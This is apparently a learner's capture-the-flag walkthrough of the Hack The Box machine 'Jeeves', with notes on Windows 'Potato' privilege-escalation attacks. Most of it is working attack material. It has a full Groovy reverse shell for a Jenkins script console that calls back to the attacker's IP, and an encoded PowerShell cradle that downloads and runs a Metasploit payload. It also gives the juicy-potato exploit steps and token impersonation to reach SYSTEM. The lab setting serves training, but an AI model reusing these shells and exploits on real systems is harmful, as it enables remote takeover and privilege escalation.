Search

Potato Attacks

Rotten Potato: Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM (foxglovesecurity.com)

Juicy Potato:

ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. (github.com)

Impersonate privilege is usually on service accounts not user accounts (foreshadowing on exam? Need service account to potato from)

Jeeves

  • Nothing on the web pages
  • SMB doesn’t work
  • dirbuster? on port 80 (HTTP)

We get

10.10.10.63:50000/askjeeves

script console

groovy reverse shell Pure Groovy/Java Reverse Shell (github.com):

String host="10.10.14.4";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

*string host is Kali IP

netcat listener:

nc -nvlp 8044

check user:

whoami

***HOW TO FIND POTATO ATTACK***

check priv:

whoami /priv
image

Impresonate Enabled***

System info:

systeminfo

copy result for system checker later (suggester, aka wes.py)

use wes.py (suggester)

cd /home/kali/wesng/
./wes.py /home/kali/Desktop/HackTheBox/Jeeves/systeminfo.txt
#history | grep wes.py
image

***HOW TO RUN POTATO ATTACK***

metasploit:

msfconsole
search web_delivery
use 1
OR
use exploit/multi/script/web_delivery

options

It defaults to Python. Usually we won’t use Python unless the machine has it. So:

show targets
set target 2
OR
set target PSH

set target 2 was PSH

PSH is powershell

set payload to:

set payload windows/meterpreter/reverse_tcp

**x64 did not work so we used low level shell!

set other options:

set lhost 10.10.14.4
set srvhost 10.10.14.4

*these are Kali IP

run

copy powershell command it gave you:

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB6AEkAWAA3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHoASQBYADcALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAB6AEkAWAA3AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4ANAA6ADgAMAA4ADAALwBZAE4AMAB1AGgATAA1ADIARABtAGkALwBKADgARgBBAFQAWABzADEAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQAOgA4ADAAOAAwAC8AWQBOADAAdQBoAEwANQAyAEQAbQBpACcAKQApADsA

paste it in the machine and hit enter

Go back to metasploit

sessions 1

meterpreter commands:

getuid
sysinfo
getprivs

we get user with getuid

we get sysinfo, in this case, we had x64 architecture but x86 meterpreter. We need to migrate!

getprivs shows if impersonate is available (we checked earlier and it was)

***HOW TO USE METERPRETER WES/WINDOWS-EXPLOIT-SUGGESTER/SUGGESTER***

run post/multi/recon/local_exploit_suggester
image

put this in the background:

background

and use reflection juicy(potato) (just reflection has potential mismatch issue):

use exploit/windows/local/ms16_075_reflection_juicy

check and change settings:

options
set lhost 10.10.14.4
set session 1
set lport 5555

need to set lport to all 5’s because the session 1 is running on all 4’s (the default for reflection)

set x64: (if using just reflection without juicy, you will need to find a process to migrate to that is x64)

set payload windows/x64/meterpreter/reverse_tcp
run

meterpreter:

getuid
shell

IF IT DOESN’T SAY SYSTEM:

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell

in shell:

cd c:\users\administrator\desktop
type hm.txt

Look deeper?????

dir /R
image

how do we see that $DATA file?

more < hm.txt:root.txt:$DATA
image

We got flag!

Alternate Data Streams